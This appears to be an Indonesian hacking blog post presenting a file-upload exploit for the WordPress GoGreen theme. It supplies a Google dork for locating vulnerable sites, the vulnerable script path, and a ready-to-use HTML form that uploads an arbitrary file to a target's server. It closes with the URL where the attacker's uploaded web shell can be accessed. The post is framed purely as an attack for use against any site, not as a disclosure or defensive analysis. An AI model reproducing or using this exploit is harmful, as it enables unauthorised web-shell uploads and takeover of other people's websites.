WordPress GoGreen File Upload Vulnerability

Assalamualaikum wr.wb

Gausah basa basi dah ya :D

Google Dork : inurl:"/wp-content/themes/gogreen/"


Exploit : /wp-content/themes/gogreen/addpress/includes/ap_fileupload.php

Source code:
 
<h1>GoGreen WordPress Exploit</h1>
<br>
<form enctype="multipart/form-data"  
action="http://www.[target].com/wp-content/themes/gogreen/addpress/includes/ap_fileupload.php" method="post">
Home Url: <input name="homeurl" type="text" value="http://" />
</br>
Template: <input name="template" type="text" value="gogreen">
</br>
Dir1: <input name="themeroot" type="text" />
</br>
Dir2: <input name="dir" type="text" />
</br>
File: <input name="file_upload" type="file" /><br />
<input type="submit" value="upload" />
</form>

Save as misalnya dengan nama "gogreen.html"

Shell Access: http://www.[target].com/wp-content/themes/gogreen/addpress/includes/YourFolderName/YourShell.php

Sekian, 
Pokoknya kalo ente masi bingung ane cipok :v
Wasssalamualaikum wr.wb

Tweet